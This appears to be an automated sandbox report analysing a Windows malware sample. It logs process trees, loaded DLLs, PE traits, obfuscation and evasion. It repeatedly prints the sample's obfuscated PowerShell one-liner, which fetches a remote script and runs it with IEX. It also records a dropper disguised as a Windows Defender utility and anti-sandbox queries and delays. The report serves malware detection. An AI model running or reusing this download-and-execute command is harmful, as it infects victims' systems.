            Source: C:\Users\user\Desktop\DBp7mBJwqD.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script""
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe "C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe" -pkek -aoa -y
            Source: C:\Users\user\Desktop\DBp7mBJwqD.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script""Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe "C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe" -pkek -aoa -y Jump to behavior
            Source: C:\Users\user\Desktop\DBp7mBJwqD.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\DBp7mBJwqD.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\DBp7mBJwqD.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\DBp7mBJwqD.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Users\user\Desktop\DBp7mBJwqD.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\DBp7mBJwqD.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\DBp7mBJwqD.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Section loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Section loaded: dhcpcsvc.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Section loaded: windowscodecs.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Section loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Section loaded: winnsi.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Section loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Section loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Section loaded: secur32.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Section loaded: schannel.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Section loaded: mskeyprotect.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Section loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Section loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Section loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Section loaded: msasn1.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Section loaded: gpapi.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: DBp7mBJwqD.exe Static PE information: Virtual size of .text is bigger than: 0x100000
            Source: DBp7mBJwqD.exe Static PE information: Image base 0x140000000 > 0x60000000
            Source: DBp7mBJwqD.exe Static file information: File size 14848000 > 1048576
            Source: DBp7mBJwqD.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x717000
            Source: DBp7mBJwqD.exe Static PE information: Raw size of .svm_hea is bigger than: 0x100000 < 0x6f0000
            Source: DBp7mBJwqD.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: DBp7mBJwqD.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

            Data Obfuscation

            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
            Source: DBp7mBJwqD.exe Static PE information: section name: .rodata
            Source: DBp7mBJwqD.exe Static PE information: section name: .svm_hea
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFE7DEAD2A5 pushad ; iretd 8_2_00007FFE7DEAD2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFE7DFC5468 pushad ; iretd 8_2_00007FFE7DFC5469
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFE7DFC752B push ebx; iretd 8_2_00007FFE7DFC756A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFE7DFC55DB push ecx; iretd 8_2_00007FFE7DFC55DC
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFE7DFC35F7 push eax; iretd 8_2_00007FFE7DFC3681
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFE7DFC00BD pushad ; iretd 8_2_00007FFE7DFC00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFE7DFC7963 push ebx; retf 8_2_00007FFE7DFC796A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFE7E09617F push es; ret 8_2_00007FFE7E096187
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Code function: 10_2_00007FFE7DFC00BD pushad ; iretd 10_2_00007FFE7DFC00C1
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Code function: 10_2_00007FFE7DFC558C push ebp; ret 10_2_00007FFE7DFC5598
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Code function: 10_2_00007FFE7DFC5623 push esp; ret 10_2_00007FFE7DFC562B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe File created: :newads (copy)

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Memory allocated: 2545CE20000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Memory allocated: 25476840000 memory reserve | memory write watch
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Thread delayed: delay time: 600000
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Thread delayed: delay time: 599891
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Thread delayed: delay time: 599781
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Thread delayed: delay time: 599672
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Thread delayed: delay time: 599563
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Thread delayed: delay time: 599438
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Thread delayed: delay time: 599313
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Thread delayed: delay time: 599203
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Thread delayed: delay time: 599094
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Thread delayed: delay time: 598969
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Thread delayed: delay time: 598859
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Thread delayed: delay time: 598750
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Thread delayed: delay time: 598641
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Thread delayed: delay time: 598531
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Thread delayed: delay time: 598422
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Thread delayed: delay time: 598313
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Thread delayed: delay time: 598188
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Thread delayed: delay time: 598078
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe Thread delayed: delay time: 597969
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4183Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5678Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWindow / User API: threadDelayed 3233Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWindow / User API: threadDelayed 353Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076Thread sleep count: 4183 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076Thread sleep count: 5678 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184Thread sleep time: -13835058055282155s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7188Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -599891s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -599672s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -599563s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -599438s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -599313s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -599203s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -599094s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -598969s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -598859s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -598750s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -598641s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -598531s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -598422s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -598313s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -598188s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -598078s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 7956Thread sleep time: -597969s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 3684Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe TID: 6644Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
